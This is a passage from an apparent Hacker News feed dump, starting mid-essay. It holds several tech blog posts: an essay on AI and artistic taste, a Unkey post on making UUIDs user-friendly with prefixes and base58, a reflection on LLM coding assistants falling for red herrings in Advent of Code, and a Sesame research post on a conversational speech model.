    The results are the worst we’ve seen. First, none of the quotes are relevant to the article I said I wanted to write. Second, none of the quote sources are correct. And third, none of the quotes are actual Marcus Aurelius quotes, let alone from the Gregory Hays translation (Ryan’s favorite, and the one from which we source for the Daily Stoic).   

    The tools will no doubt get better at pulling relevant quotes. But I’m less confident they’ll ever solve the perennial mysteries of taste and discernment. Many great artists have put out what they thought was their best work, only to see it flop. And vice versa—what they thought was average ended up going viral. Every time you release a work of art into the world, you can’t forecast its reception with any certainty. The best you can do is have a vague sense that others might like it. You (or the AI bot, or a hybrid of the two) are always guessing.

    But if anyone is in a better position to make better guesses, I do think it’s humans. 

    When a work of art—whether a book or an album, a movie, a TV show, or a YouTube video—is well received, we say that it connected. The work connected with an audience—with humans. 

    To connect with humans, it helps to be among humans. Leonardo da Vinci kept a notebook hanging from his belt loop and, one of his contemporaries would recall, “went to places where he knew that people assembled and observed their faces, their manners, dresses, and gestures.” The filmmaker David Mamet used to ride the bus around Chicago, take notes of the things people said, and then go home and write dialogue. J.K. Rowling had the initial idea for Harry Potter on a Manchester-London train, wrote a lot of the series in cafes, and named some characters after childhood friends and based others on favorite teachers. 

    Artists who get so famous that they can’t go out in public talk about how not being able to do so makes it hard to create art that connects. To come up with material for Seinfeld, for instance, Seinfeld and co-creator Larry David liked to hang out in public settings where they could observe and eavesdrop on strangers. As the show became a cultural phenomenon, Seinfeld and David couldn’t go out in public like they used to. Strangers didn’t act like strangers around them. This slow detachment from humanity made it harder to make a show that connected with humanity. 

    When you don’t experience reality like most people do, it’s hard to make things that connect with most people. 

    AI, completely detached from reality, will have a hard time making things that connect with people. It’s something of a hybrid between the Harvard grad student in the movie Good Will Hunting, who can regurgitate page 98 of Daniel Vickers’s Work in Essex County but can’t come up with any thoughts of his own, and Will Hunting, who can give you the skinny on Michelangelo—life’s work, political aspirations, his relationship with the pope, sexual orientation—but can’t tell you what it’s like to stand in the Sistine Chapel and look up at that beautiful ceiling.

    AI is smart. Ask it about books, and it can spit out a top-100 list. But it can’t tell you what it’s like to read a passage that puts perfectly something you’ve felt but couldn’t articulate. Ask it about music, and it can write you lyrics in the style of whoever you’d like. But it’s never listened to a great song, never heard one right when it needed to be heard. Ask it about taking a walk, and it can give you science-backed reasons to go for one. But it’s never been on a walk, never been totally excited by a thought or an idea that seemed to come from out of nowhere. Ask it about coffee, and it can give you an infographic that details tens or hundreds of brewing methods. But it’s never had that first sip of that first cup of the day. Ask it about connecting with an audience, and it can give you hundreds of best practices. But it can’t guarantee any of them are going to work. 

    It can’t be certain that your work (or its own) will connect with the human experience. It can’t be certain that the work will land in the middle of that Venn diagram. It can’t be certain that its taste and discernment are “great.”

    This remains the perennial problem of making great art. 

    If AI solves it, well, I can teach you how to work an espresso machine.

    ]]>
    https://billyoppenheimer.com/the-cup-of-coffee-theory/ hacker-news-small-sites-43229170 Sun, 02 Mar 2025 10:44:55 GMT
    <![CDATA[The UX of UUIDs]]> thread link) | @nomilk
    March 2, 2025 | https://www.unkey.com/blog/uuid-ux | archive.org

    TLDR: Please don't do this:

    https://company.com/resource/c6b10dd3-1dcf-416c-8ed8-ae561807fcaf

    The baseline: Ensuring global uniqueness

    Unique identifiers are essential for distinguishing individual entities within a system. They provide a reliable way to ensure that each item, user, or piece of data has a unique identity. By maintaining uniqueness, applications can effectively manage and organize information, enabling efficient operations and facilitating data integrity.

    Let’s not pretend like we are Google or AWS who have special needs around this. Any securely generated UUID with 128 bits is more than enough for us. There are lots of libraries that generate one, or you could fall back to the standard library of your language of choice. In this blog, I'll be using Typescript examples, but the underlying ideas apply to any language.

    const id = crypto.randomUUID();
    // '5727a4a4-9bba-41ae-b7fe-e69cf60bb0ab'

    Stopping here is an option, but let's take the opportunity to enhance the user experience with small yet effective iterative changes:

    1. Make them easy to copy
    2. Prefixing
    3. More efficient encoding
    4. Changing the length

    Copying UUIDs is annoying

    Try copying this UUID by double-clicking on it:

    c6b10dd3-1dcf-416c-8ed8-ae561807fcaf

If you're lucky, you got the entire UUID, but most people will have selected only a single section. One way to enhance the usability of unique identifiers is to make them easily copyable. This can be achieved by removing the hyphens from the UUIDs, allowing users to simply double-click the identifier to copy it. By eliminating the need for manual selection and copy-pasting, this small change can greatly improve the user experience when working with identifiers.

    Removing the hyphens is probably trivial in all languages, here’s how you can do it in js/ts:

    const id = crypto.randomUUID().replace(/-/g, "");
    // fe4723eab07f408384a2c0f051696083

    Try copying it now, it’s much nicer!

    Prefixing

    Have you ever accidentally used a production API key in a development environment? I have, and it’s not fun. We can help the user differentiate between different environments or resources within the system by adding a meaningful prefix. For example, Stripe uses prefixes like sk_live_ for production environment secret keys or cus_ for customer identifiers. By incorporating such prefixes, we can ensure clarity and reduce the chances of confusion, especially in complex systems where multiple environments coexist.

    const id = `hello_${crypto.randomUUID().replace(/-/g, "")}`;
    // hello_1559debea64142f3b2d29f8b0f126041

    Naming prefixes is an art just like naming variables. You want to be descriptive but be as short as possible. I'll share ours further down.

    Encoding in base58

Instead of using a hexadecimal representation for identifiers, we can also consider encoding them more efficiently, such as in base58. Base58 encoding uses a larger character set and avoids ambiguous characters, such as upper case I and lower case l, resulting in shorter identifier strings without compromising readability.

As an example, an 8-character base58 string can store roughly 30,000 times as many states as an 8-character hex string. And at 16 characters, the base58 string can store 889,054,070 times as many combinations.

    You can probably still do this with the standard library of your language but you could also use a library like nanoid which is available for most languages.

    import { customAlphabet } from "nanoid";
    export const nanoid = customAlphabet(
      "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz",
    );
    
    const id = `prefix_${nanoid(22)}`;
    // prefix_KSPKGySWPqJWWWa37RqGaX

We generated a 22-character ID here, which can encode ~100x as many states as a UUID while being 10 characters shorter.

        Characters   Length   Total States
UUID    16           32       2^122 = 5.3e+36
Base58  58           22       58^22 = 6.2e+38

    The more states, the higher your collision resistance is because it takes more generations to generate the same ID twice (on average and if your algorithm is truly random)

    Changing the entropy

    Not all identifiers need to have a high level of collision resistance. In some cases, shorter identifiers can be sufficient, depending on the specific requirements of the application. By reducing the entropy of the identifiers, we can generate shorter IDs while still maintaining an acceptable level of uniqueness.

Reducing the length of your IDs can be nice, but you need to be careful and ensure your system is protected against ID collisions. Fortunately, this is pretty easy to do in your database layer. In our MySQL database we use IDs mostly as primary keys, and the database protects us from collisions. In case an ID already exists, we just generate a new one and try again. If our collision rate went up significantly, we could simply increase the length of all future IDs and we'd be fine.

Length       Example                            Total States
nanoid(8)    re6ZkUUV                           1.3e+14
nanoid(12)   pfpPYdZGbZvw                       1.4e+21
nanoid(16)   sFDUZScHfZTfkLwk                   1.6e+28
nanoid(24)   u7vzXJL9cGqUeabGPAZ5XUJ6           2.1e+42
nanoid(32)   qkvPDeH6JyAsRhaZ3X4ZLDPSLFP7MnJz   2.7e+56

    Conclusion

    By implementing these improvements, we can enhance the usability and efficiency of unique identifiers in our applications. This will provide a better experience for both users and developers, as they interact with and manage various entities within the system. Whether it's copying identifiers with ease, differentiating between different environments, or achieving shorter and more readable identifier strings, these strategies can contribute to a more user-friendly and robust identification system.

    IDs and keys at Unkey

    Lastly, I'd like to share our implementation here and how we use it in our codebase. We use a simple function that takes a typed prefix and then generates the ID for us. This way we can ensure that we always use the same prefix for the same type of ID. This is especially useful when you have multiple types of IDs in your system.

    import { customAlphabet } from "nanoid";
    export const nanoid = customAlphabet(
      "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz",
    );
    
    const prefixes = {
      key: "key",
      api: "api",
      policy: "pol",
      request: "req",
      workspace: "ws",
      keyAuth: "key_auth", // <-- this is internal and does not need to be short or pretty
      vercelBinding: "vb",
      test: "test", // <-- for tests only
    } as const;
    
    export function newId(prefix: keyof typeof prefixes): string {
      return [prefixes[prefix], nanoid(16)].join("_");
    }

    And when we use it in our codebase, we can ensure that we always use the correct prefix for the correct type of id.

    import { newId } from "@unkey/id";
    
    const id = newId("workspace");
    // ws_dYuyGV3qMKvebjML
    
    const id = newId("keyy");
    // invalid because `keyy` is not a valid prefix name

I've been mostly talking about identifiers here, but an API key really is just an identifier too. It's just a special kind of identifier that is used to authenticate requests. We use the same strategies for our API keys as we do for our identifiers. You can add a prefix to let your users know what kind of key they are looking at, and you can specify the length of the key within reason. Collisions for API keys are much more serious than for IDs, so we enforce secure limits.

It's quite common to prefix your API keys with something that identifies your company. For example, Resend uses re_ and OpenStatus uses os_ prefixes. This allows your users to quickly identify the key and know what it's used for.

    const key = await unkey.key.create({
      apiId: "api_dzeBEZDwJ18WyD7b",
      prefix: "blog",
      byteLength: 16,
      // ... omitted for brevity
    });
    
    // Created key:
    // blog_cLsvCvmY35kCfchi
    ]]>
    https://www.unkey.com/blog/uuid-ux hacker-news-small-sites-43228860 Sun, 02 Mar 2025 09:39:35 GMT
    <![CDATA[What Challenge 13 thought me about LLMs]]> thread link) | @keithrozario
    March 2, 2025 | https://www.keithrozario.com/2025/03/what-challenge-13-thought-me-about-llms.html | archive.org

    While doing programming challenges in Advent of Code, I came across an interesting behavior of LLMs in coding assistants and decided to write about it to clear my thoughts.

    First some background.

Advent of Code is a series of daily coding challenges released during the season of advent (the period just before Christmas). Each challenge has 2 parts, and you must solve part 1 before part 2 is revealed. Part 2 is harder than part 1 and usually requires rewrites to solve. Sometimes the rewrites are quite extensive; other times they are small incremental steps.

If you haven't done these challenges before, I encourage you to try. None of them are easy (at least to me), but all of them are solvable with enough elbow grease and time.

That said, the challenges are still contrived. Firstly, the questions are much better written than what you'd see in a Jira ticket or requirements document. They include a detailed description of what must be done, and sample inputs and outputs you can test. Secondly, the challenges extend beyond what most coders do on a daily basis: one challenge required writing a small program to 'defrag' a disk, another required building a tiny assembler that ran its own program, and multiple questions involved navigating a 2D maze with obstacles along the way. All fun things you will probably not do as a programmer in the real world.

I took on the challenges both to improve my coding skills and to learn how I could use coding assistants in these close-to-real-world scenarios. The hope was that I would gain some insight into how I could use these tools more effectively, should I ever need to do something more than solving contrived programming challenges before Christmas.

    OK. Background complete.

Let's move on to the challenge that changed the way I would look at LLMs forever.

    There are 25 challenges in total, each consisting of 2 parts. Here is a summarized version of the first part of Challenge number 13:

    • A resort has an arcade with claw machines.
    • Each machine has two buttons, A and B.
    • Button A costs 3 tokens, Button B costs 1 token.
    • Each button moves the claw a specific amount along the X and Y axes.
    • To win a prize, the claw must be positioned exactly above the prize on both axes.
    • Each button can be pressed a maximum of 100 times.
    • Find the minimum number of tokens for each machine required to win the prize

An example scenario would be the following:

    Button A: X+94, Y+34
    Button B: X+22, Y+67
    Prize: X=8400, Y=5400

Pause for a moment and try to construct your strategy for solving this puzzle. Keep in mind that the solution will need to solve quite a few of these machines.

    Done? Ok, let’s proceed.

This question is especially beautiful because it contains "hints" that are actually nefarious red herrings. But I don't want to spoil the fun, so let's go ahead and solve this.

Because we know each button can be pressed at most 100 times, there are only 10,000 possible combinations per machine. This might sound like a lot, but my 6-year-old MacBook handled it easily. We can construct a simple brute-force solution like this.

We iterate through 100 pushes of button A combined with 100 pushes of button B, and find every combination that gets the claw to the location we want. Then we calculate the number of tokens required for each of those solutions, and print the smallest token count as our final answer.
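In Python, a minimal sketch of that brute force looks like this (using the example machine above; the variable names are mine):

a_x, a_y = 94, 34               # Button A movement
b_x, b_y = 22, 67               # Button B movement
prize_x, prize_y = 8400, 5400

best = None
for a_pushes in range(101):
    for b_pushes in range(101):
        if (a_pushes * a_x + b_pushes * b_x == prize_x
                and a_pushes * a_y + b_pushes * b_y == prize_y):
            cost = 3 * a_pushes + b_pushes   # A costs 3 tokens, B costs 1
            best = cost if best is None else min(best, cost)
print(best)                      # 280 for this machine (80 A and 40 B presses)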

    Easy.

    But now let’s go part 2. Which has a twist that makes it more difficult … as always:

    • You realize there is a unit conversion error in the position of the prizes
• They're off by a factor of more than 10 million
    • Now instead of just 100 presses for each button, each prize will require more than 100 Billion presses

    Nested for loops aren’t going to cut it here. Well they could, but you’d be looping through 10 sextillion (!!) iterations for each machine. I’m not a very good programmer, but even I know you should never consider nested loops for numbers that end with ‘illion’.

    Take a pause again, and think about how you might solve part 2.

    The solution is simple once you realize this is a linear algebra problem, and quite a simple one at that.

We can see this on lines 9 and 10 of our initial solution. There are two equations with the variables a_pushes and b_pushes, and since we have 2 variables and 2 linear equations, this is solvable. Personally I like the matrices approach, and Python conveniently has the numpy package, which solves this problem in one line.
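A minimal sketch of that approach for the example machine (the integrality check is my own addition, since only whole numbers of presses count):

import numpy as np

coeffs = np.array([[94, 22], [34, 67]])              # columns: button A, button B
prize = np.array([8400, 5400])
a_pushes, b_pushes = np.linalg.solve(coeffs, prize)  # the one-liner

# Keep the solution only if both press counts are whole numbers.
if abs(a_pushes - round(a_pushes)) < 1e-3 and abs(b_pushes - round(b_pushes)) < 1e-3:
    print(3 * round(a_pushes) + round(b_pushes))     # 280 again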

    Much more performant.

    Much more elegant.

    Certainly better than the solution we wrote for in part 1.

    But …. why did we come up with such a slow solution for part 1 in the first place? I think it was the last 2 lines of the instructions:

    • Each button will be pressed a maximum of 100 times.
    • Find the minimum number of presses for each machine to win the prize

The first is what I call a pink herring. It helps you in part 1, but sends you wildly off course for part 2. Yes, for part 1 it helped by guiding us down the nested-for-loop path, but this was completely untenable for part 2. Had the question not included a maximum number of presses, we might have gone straight to linear algebra, requiring no rewrite for part 2.

    The second is a particularly nasty red herring. This question only has 1 (and only 1!!) solution. There is no concept of minimum or maximum, because there is only ONE solution. Any code you wrote to choose a minimum from a list of possible solutions was completely and utterly unnecessary.

    And here is where we talk about the LLMs in coding assistants.

First off, none of the LLMs in any of the assistants could solve this puzzle in one go (even just part 1). Some came close, requiring only minimal tweaking to get part 1 working.

Secondly, ALL the LLMs used the nested-for-loop solution, like me, in their first iteration.

    ALL!

    Without exception!

    Sonnet, GPT-4o and Gemini Flash.

    That’s interesting, that the LLMs fall for the same tricks that humans do. But then again, the red herrings ‘prompt’ the LLMs down a certain path, so we shouldn’t be all that surprised.

    https://www.flickr.com/photos/jdhancock/4617759902

If you grew up watching Star Trek like me, you know that Data, the android on the Starship Enterprise, is rational, emotionless, and super intelligent. Data wouldn't be tricked by this. These red herrings are more likely to trick a robot like C3PO, a bumbling buffoon whose code you certainly wouldn't trust.

    I’m not saying the LLMs are like C3PO — but they’re certainly not like Data.

    I prompted them again, to improve their code to make it faster:

    the solution is too slow, it times out because the real values, the number of presses can be in the millions. Is there a faster way to solve this?

And voila, all of them managed to identify that this is a linear algebra problem, and surprisingly all 3 had different takes on how to solve it. Each solution worked in the end (after some tweaking), and the problem was solved.

But… the LLMs still maintained the concept of minimum tokens, either through the naming of the function/method or, with at least one of them, by still checking for a minimum value. To me, this just means the LLMs never really 'understand' anything, even though they give off the impression of deep understanding.

Any human who understood linear algebra would remove all mentions of 'minimum' from their code once they understood the problem. There is no minimum here; we should drop any mention of it to improve our code.

The coding assistants really did help me solve these questions faster — but I think we need to be cautious about what help we accept. If you don't understand linear algebra, having the LLMs write out code that uses it would mean running code that neither you nor the LLM understood well. That's a recipe for disaster.

    LLMs are susceptible to trickery just like humans — so how can we use them more effectively?

    System 1 and System 2

A framework I found useful comes from the psychologist Daniel Kahneman. If psychology were football, Kahneman would be standing amongst Pele, Maradona, Messi and Ronaldo.

In his book Thinking, Fast and Slow, he describes two systems in our brain that act almost exclusively and independently, on which he bestowed the unfortunate names of System 1 and System 2 (reading too much Cat in the Hat?).

System 1 is responsible for quick judgments and decisions based on patterns and experiences. It's responsible for automatic activities like detecting hostility in a voice, reading words on billboards, and driving a car on an empty road.

System 2 is slower, more deliberate, and more logical. It's responsible for complex problem-solving and analytical tasks: seeking new or missing information, making decisions, and logical and skeptical thinking.

    The best way to illustrate this is from the Baseball and Bat question. I’m sure you’ve seen this before:

    A baseball and bat together cost $1.10.

The bat costs $1 more than the ball.

    How much does the ball cost?

    The immediate answer that jumps into your brain is 10 cents ($0.10). But that is the wrong answer. Upon learning this is the wrong answer, most folks can slowly figure out that the correct answer is indeed 5 cents ($0.05).

The first answer of 10 cents comes from System 1. It's always on, ready to go, and barrels in with an answer instantly. Once you're told this is wrong, your mind immediately kickstarts System 2, and System 2 may do a little algebra, or a quick calculation or two, and eventually end up with the correct answer of 5 cents. System 2 is not always on; it's a finite resource with expensive computational requirements. It does some sanity checks on System 1 — and is only ever in full-drive mode when required.
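Written out, that little algebra: if the ball costs x, the bat costs x + $1.00, so x + (x + 1.00) = 1.10, which gives 2x = 0.10 and x = $0.05.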

System 1 is easily fooled by red herrings, like "find the minimum number of tokens" in a problem with only one solution. System 2 is more deliberate and works from first principles — it's the system you start up whenever you tell yourself "let's take a step back".

    Are LLMs purely System 1 automatons?

Well, the question has been posed before, and initially (in the GPT-3 days) the LLMs would fall for these tricks, but they have since been improved. But have they improved to the point that they are actually reasoning at a System 2 level?

Or is it still just System 1 with guardrails that prevent them from making silly mistakes on very popular psychology questions? Are LLMs in coding assistants purely System 1 automatons with hard-coded checks to make them look like System 2?

All the models were able to correctly solve the linear algebra problem once prompted about the solution being slow. They correctly identified the problem, but only after being told to effectively ignore the '100 presses' condition. They still thought there would be a minimum token count (the other red herring, which we never prompted them to ignore). So red herrings work, until you explicitly tell the model to avoid them.

In other words, the model has no way to figure out whether something is a red herring unless the user explicitly tells it. It doesn't have a deep understanding of linear algebra — or even just a high-school-level understanding of it. It's brain-dumping.

There's a brilliant talk by Terence Tao, where he says something about LLMs and how they help humans solve complex maths problems that really resonated with me:

    …they’re not solving the problem from first principles, they’re just guessing at each step of the output what is the most natural thing to say next. The amazing thing is sometimes that works, but often it doesn’t

Of course this talk was from the GPT-4 days, and perhaps things have changed, but I've yet to see something that actually solves from first principles rather than trying to predict the next token. Just saying "explain your steps" isn't fundamentally changing the way the model approaches the problem. The underlying model operation is still passing input through a large, complex network of vector calculations and getting an output; just because there is 'reasoning' doesn't necessarily mean there is understanding or building from first principles.

After all, System 1 works in about the same way as an LLM — you don't start every conversation with a plan for where you will conclude; you just blurt out the words, and by the time you say something, the next thing pops into your mind and you say that… ad infinitum. That's System 1.

System 2 is deliberate writing: you start with something, refine it over iterations, ensure the message is clear, and only then publish it. So can we use an LLM effectively, knowing that it's a sort of System 1 assistant?

    Challenge 23

    Challenge 23 helped me further clarify my thoughts. Part 1 of that challenge can be summarized as below:

    1. You’re given a network map of computer connections
    2. Each connection is represented as two computer names joined by a hyphen (e.g., kh-tc)
    3. Connections are undirected (order doesn’t matter)
    4. Task:
      • Find all sets of 3 computers that are fully connected to each other
      • Count how many of these sets contain a computer with a name starting with ‘t’

I first attempted to solve this on my own, but with a twist. Recognizing that this was a graph problem, I looked for popular graph tools for Python (my programming language of choice). Initially I looked at CogDB, since it was the first search result that made sense, but I soon gave up; while it had promise, the project seemed somewhat abandoned.

After searching a bit more, I stumbled across this Reddit post, which suggested I use networkx. I did a little more digging and found rich documentation and a community around the package — so I used it.

After finding networkx, I used the coding assistants to help me write code for it, and in barely 20 minutes I had solved the challenge. The main logic was under 3 lines of code. Most of the time was spent researching the problem and possible solutions — very little was spent actually coding.

What happened next was even more impressive. When part 2 rolled out, the question asked for the maximum size of a clique. This was one extra line in my code, because I had used an external package that was purpose-built over many years to solve graph problems. What would sometimes take massive rewrites or performance improvements was solved with just one extra line here.
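A sketch of the whole thing (my own reconstruction, assuming the input format described above; networkx does all the heavy lifting):

import networkx as nx

# Build an undirected graph from "kh-tc"-style lines.
edges = [line.strip().split("-") for line in open("input.txt") if line.strip()]
g = nx.Graph(edges)

# Part 1: fully connected sets of 3 (triangles) containing a name starting with "t".
triangles = (c for c in nx.enumerate_all_cliques(g) if len(c) == 3)
print(sum(any(n.startswith("t") for n in t) for t in triangles))

# Part 2: the largest fully connected set is the maximum clique -- one extra line.
print(max(nx.find_cliques(g), key=len))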

    More importantly, I didn’t need the LLMs to generate large code blocks for me either, I was using code within a high quality package. There was little technical debt generated by this approach.

If you asked the LLMs to solve the problem, they would all barrel down the System 1 path and write nested for loops and massive if-else statements. Developers running on System 1 do exactly the same thing — they start writing code for a problem the instant they see it. The problem is that even if it solves the puzzle, you now have hundreds of lines of code to maintain, test, and validate — when an external, battle-hardened open source solution would have been far better.

Good (no, great) developers read a problem, understand the requirements, and research possible solutions before they even write the first line of code (unless it's a space they're extremely familiar with). Chances are you're not them, and just dumping the problem onto an LLM is definitely not the way to go.

Engage your System 2: pose the problem and suggest possible solutions, like an external package that you're confident will cover your use case, and you'll get a much better result that is not only more elegant but also more maintainable.

    The human (at least for now) has to initiate the System 2 behavior. Think about how to solve the problem — perhaps even take your time, knowing the actual coding part (where System 1 takes over) can be substantially automated and accelerated.

This is all new to me, but I'm now getting the hang of LLMs. I'm not a professional coder, but I managed to solve most of the Advent of Code challenges with help from the coding assistants. Without the assistants I would not have been able to do it — at least not in the same amount of time.

However, I think the best coders will always be the ones who work from first principles, who are able to decline what the LLM offers and guide it down the 'right' path. Everybody else is going to 'produce' hundreds or even thousands of lines of code from an LLM, most of which won't make sense and, even if it works, will be unreadable.

    I shudder at a world where code is rewritten over and over again, and maintained in a million different places.

    Conclusion

Coding assistants are here to stay. At $20-$30 a month, it's hard to find fault with them. Developers can cost anywhere from $300 to $3,000 a day, so the break-even for a coding assistant is something in the order of 1 hour a month, or, if you're really expensive, perhaps even 15 minutes a month. This will certainly pay for itself, and more, immediately.

However… this isn't a case of freeing up System 1 so developers can focus on System 2, because that's not what will happen. There's a reason System 2 isn't always engaged: it's expensive cognition, a finite resource with a maximum number of usable hours per day. Just because you have time for System 2 doesn't mean it can be engaged. But if developers know that the final code-writing part of a solution can be accelerated, they can spend more time on the design phase of a problem, confident they'll hit deadlines with an LLM by their side.

    So….

Be careful how you use them. Blindly accepting what an LLM outputs is a recipe for disaster; so is dumping a question on it and hoping for a good solution. The solution has to be coaxed out of the LLM, with you, the human, acting as the System 2 thinker.

Sure, someone posted on LinkedIn about how the latest LLM managed to compile a binary that accomplished everything they wanted in a single shot — but there are millions of people using these assistants. One of them is certain to get that one-in-a-million response, and chances are high that they'll post it online. Do not expect that one-in-a-million response to be the norm instead of the exception.

    People only post exceptional things after all.

Using LLMs effectively and consistently requires some fine-tuning of the user: understanding what the limitations of these tools are, and how to avoid the pitfalls that come with them.

    ]]>
    https://www.keithrozario.com/2025/03/what-challenge-13-thought-me-about-llms.html hacker-news-small-sites-43228832 Sun, 02 Mar 2025 09:34:31 GMT
    <![CDATA[Crossing the uncanny valley of conversational voice]]> thread link) | @monroewalker
    March 1, 2025 | https://www.sesame.com/research/crossing_the_uncanny_valley_of_voice | archive.org

    February 27, 2025

    Brendan Iribe, Ankit Kumar, and the Sesame team

    How do we know when someone truly understands us? It is rarely just our words—it is in the subtleties of voice: the rising excitement, the thoughtful pause, the warm reassurance.

    Voice is our most intimate medium as humans, carrying layers of meaning through countless variations in tone, pitch, rhythm, and emotion.

    Today’s digital voice assistants lack essential qualities to make them truly useful. Without unlocking the full power of voice, they cannot hope to effectively collaborate with us. A personal assistant who speaks only in a neutral tone has difficulty finding a permanent place in our daily lives after the initial novelty wears off.

    Over time this emotional flatness becomes more than just disappointing—it becomes exhausting.

    Achieving voice presence

    At Sesame, our goal is to achieve “voice presence”—the magical quality that makes spoken interactions feel real, understood, and valued. We are creating conversational partners that do not just process requests; they engage in genuine dialogue that builds confidence and trust over time. In doing so, we hope to realize the untapped potential of voice as the ultimate interface for instruction and understanding.

    Key components

    • Emotional intelligence: reading and responding to emotional contexts.
    • Conversational dynamics: natural timing, pauses, interruptions and emphasis.
    • Contextual awareness: adjusting tone and style to match the situation.
    • Consistent personality: maintaining a coherent, reliable and appropriate presence.

    We’re not there yet

    Building a digital companion with voice presence is not easy, but we are making steady progress on multiple fronts, including personality, memory, expressivity and appropriateness. This demo is a showcase of some of our work in conversational speech generation. The companions shown here have been optimized for friendliness and expressivity to illustrate the potential of our approach.

    Conversational voice demo

    1. Microphone permission is required. 2. Calls are recorded for quality review but not used for ML training and are deleted within 30 days. 3. By using this demo, you are agreeing to our Terms of Use and Privacy Policy. 4. We recommend using Chrome (Audio quality may be degraded in iOS/Safari 17.5).

    Technical post

    Authors

    Johan Schalkwyk, Ankit Kumar, Dan Lyth, Sefik Emre Eskimez, Zack Hodari, Cinjon Resnick, Ramon Sanabria, Raven Jiang

    To create AI companions that feel genuinely interactive, speech generation must go beyond producing high-quality audio—it must understand and adapt to context in real time. Traditional text-to-speech (TTS) models generate spoken output directly from text but lack the contextual awareness needed for natural conversations. Even though recent models produce highly human-like speech, they struggle with the one-to-many problem: there are countless valid ways to speak a sentence, but only some fit a given setting. Without additional context—including tone, rhythm, and history of the conversation—models lack the information to choose the best option. Capturing these nuances requires reasoning across multiple aspects of language and prosody.

To address this, we introduce the Conversational Speech Model (CSM), which frames the problem as an end-to-end multimodal learning task using transformers. It leverages the history of the conversation to produce more natural and coherent speech. There are two key takeaways from our work. The first is that CSM operates as a single-stage model, thereby improving efficiency and expressivity. The second is our evaluation suite, which is necessary for evaluating progress on contextual capabilities and addresses the fact that common public evaluations are saturated.

    Background

    One approach to modeling audio with transformers is to convert continuous waveforms into discrete audio token sequences using tokenizers. Most contemporary approaches ([1], [2]) rely on two types of audio tokens:

    1. Semantic tokens: Compact speaker-invariant representations of semantic and phonetic features. Their compressed nature enables them to capture key speech characteristics at the cost of high-fidelity representation.
    2. Acoustic tokens: Encodings of fine-grained acoustic details that enable high-fidelity audio reconstruction. These tokens are often generated using Residual Vector Quantization (RVQ) [2]. In contrast to semantic tokens, acoustic tokens retain natural speech characteristics like speaker-specific identity and timbre.

    A common strategy first models semantic tokens and then generates audio using RVQ or diffusion-based methods. Decoupling these steps allows for a more structured approach to speech synthesis—the semantic tokens provide a compact, speaker-invariant representation that captures high-level linguistic and prosodic information, while the second-stage reconstructs the fine-grained acoustic details needed for high-fidelity speech. However, this approach has a critical limitation; semantic tokens are a bottleneck that must fully capture prosody, but ensuring this during training is challenging.

    RVQ-based methods introduce their own set of challenges. Models must account for the sequential dependency between codebooks in a frame. One method, the delay pattern (figure below) [3], shifts higher codebooks progressively to condition predictions on lower codebooks within the same frame. A key limitation of this approach is that the time-to-first-audio scales poorly because an RVQ tokenizer with N codebooks requires N backbone steps before decoding the first audio chunk. While suitable for offline applications like audiobooks, this delay is problematic in a real-time scenario.

    Example of delayed pattern generation in an RVQ tokenizer with 4 codebooks
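As a toy illustration of that delay pattern (shapes, toy content, and the padding value are my own choices, not from the paper):

import torch

N, T = 4, 6                               # codebooks, frames
frames = torch.arange(T).repeat(N, 1)     # toy content: each row holds frame indices
delayed = torch.full((N, T + N - 1), -1)  # -1 marks padding

# Codebook k is shifted right by k steps, so frame t's higher codebooks are
# predicted after (and conditioned on) its lower codebooks.
for k in range(N):
    delayed[k, k:k + T] = frames[k]
print(delayed)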

    Conversational Speech Model

    CSM is a multimodal, text and speech model that operates directly on RVQ tokens. Inspired by the RQ-Transformer [4], we use two autoregressive transformers. Different from the approach in [5], we split the transformers at the zeroth codebook. The first multimodal backbone processes interleaved text and audio to model the zeroth codebook. The second audio decoder uses a distinct linear head for each codebook and models the remaining N – 1 codebooks to reconstruct speech from the backbone’s representations. The decoder is significantly smaller than the backbone, enabling low-latency generation while keeping the model end-to-end.

    CSM model inference process. Text (T) and audio (A) tokens are interleaved and fed sequentially into the Backbone, which predicts the zeroth level of the codebook. The Decoder then samples levels 1 through N – 1 conditioned on the predicted zeroth level. The reconstructed audio token (A) is then autoregressively fed back into the Backbone for the next step, continuing until the audio EOT symbol is emitted. This process begins again on the next inference request, with the interim audio (such as a user utterance) being represented by interleaved audio and text transcription tokens.

    Both transformers are variants of the Llama architecture. Text tokens are generated via a Llama tokenizer [6], while audio is processed using Mimi, a split-RVQ tokenizer, producing one semantic codebook and N – 1 acoustic codebooks per frame at 12.5 Hz. [5] Training samples are structured as alternating interleaved patterns of text and audio, with speaker identity encoded directly in the text representation.

    Compute amortization

    This design introduces significant infrastructure challenges during training. The audio decoder processes an effective batch size of B × S and N codebooks autoregressively, where B is the original batch size, S is the sequence length, and N is the number of RVQ codebook levels. This high memory burden even with a small model slows down training, limits model scaling, and hinders rapid experimentation, all of which are crucial for performance.

    To address these challenges, we use a compute amortization scheme that alleviates the memory bottleneck while preserving the fidelity of the full RVQ codebooks. The audio decoder is trained on only a random 1/16 subset of the audio frames, while the zeroth codebook is trained on every frame. We observe no perceivable difference in audio decoder losses during training when using this approach.

Amortized training process. The backbone transformer models the zeroth level across all frames (highlighted in blue), while the decoder predicts the remaining N – 1 levels, but only for a random 1/16th of the frames (highlighted in green). The top section highlights the specific frames modeled by the decoder for which it receives loss.
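A toy illustration of the masking idea (stand-in losses and shapes of my own, not Sesame's implementation):

import torch

B, S = 4, 2048                             # batch size, sequence length
per_frame_decoder_loss = torch.rand(B, S)  # stand-in for real decoder losses

# The decoder receives loss on only a random 1/16th of the frames...
mask = torch.rand(B, S) < 1.0 / 16
decoder_loss = per_frame_decoder_loss[mask].mean()

# ...while the backbone's zeroth-codebook loss still covers every frame.
backbone_loss = torch.rand(B, S).mean()    # stand-in
print(decoder_loss, backbone_loss)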

    Experiments

    Dataset: We use a large dataset of publicly available audio, which we transcribe, diarize, and segment. After filtering, the dataset consists of approximately one million hours of predominantly English audio.

    Model Sizes: We trained three model sizes, delineated by the backbone and decoder sizes:

    • Tiny: 1B backbone, 100M decoder
    • Small: 3B backbone, 250M decoder
    • Medium: 8B backbone, 300M decoder

    Each model was trained with a 2048 sequence length (~2 minutes of audio) over five epochs.

    Samples

    Paralinguistics

    Sentences from Base TTS

    Foreign words

    Sentences from Base TTS

    Contextual expressivity

    Samples from Expresso, continuation after chime

    Pronunciation correction

    Pronunciation correction sentence is a recording, all other audio is generated.

    Conversations with multiple speakers

    Single generation using audio prompts from two speakers

    Evaluation

